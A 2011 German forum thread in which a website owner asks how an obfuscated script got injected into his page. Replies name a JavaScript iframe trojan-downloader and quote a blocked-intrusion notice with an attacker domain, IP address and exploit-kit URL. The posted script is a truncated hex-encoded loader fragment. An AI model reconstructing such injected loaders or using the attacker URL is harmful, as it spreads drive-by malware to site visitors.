Scriptvirus auf der eigenen Website

Dieses Thema im Forum "PC" wurde erstellt von intercorni, 22. Juli 2011.

  1. Ein Kollege hat mich darauf aufmerksam gemacht, dass er beim Aufruf meiner Website eine Warnung vom Virenscanner erhält.
    Danach habe ich mir den HTML Code angesehen und erstaunt einen Eintrag festgestellt, der mit großer Wahrscheinlichkeit
    hinzugefügt wurde, jedoch nicht von mir:

    Code:
    <script>var t="";var arr="646f63756d656e742e777269746528273c696672 ...
    Wie kann soetwas passieren? Ich bin gerade etwas entsetzt.
     
  2. marv42dp

    marv42dp aktiviert

    Ja. Kaspersky sperrt hier gar den Zugriff auf die Seite. Trojan-Downloader.JS.Iframe.chf heisst der Schädling bei denen.

    Höchstwahrscheinlich durch eine Schwachstelle im Webserver (oder Erweiterungen wie PHP) oder einem CMS (falls sowas eingesetzt wird).
    Wie der Angriffsvektor genau verlief, kann nur der Betreiber des Servers herausfinden.
     
  3. Cyborg

    Cyborg aktiviert

    Schmeiß zuerst mal die ungefragt abgespielte Musik raus, sowas hat man vielleicht vor 20 Jahren toll gefunden. Wenn schon automatische Medien, dann sollten sie einfach abschaltbar sein.

    --- EINDRINGVERSUCH VON ANDREWCHEN.US [78.111.51.100, 80) WURDE BLOCKIERT ---
    __ BLACKHOLE TOOLKIT WEBSITE 5 __

    ANGREIFER-URL: andrewchen.us/forum.php?tp=9b129b234e593d76

    Wo hast Du denn Deine Website gespeichert, dass sowas läuft?
     
  4. Naja die Website ist ja dazu da um die Musik zu präsentieren. Und stoppen kann man diese, in dem man den Stop Button oben im Player betätigt.
    Gehostet habe ich bei www.all-inkl.com
    PHP nutze ich nur für das Mailformular.
     

Diese Seite empfehlen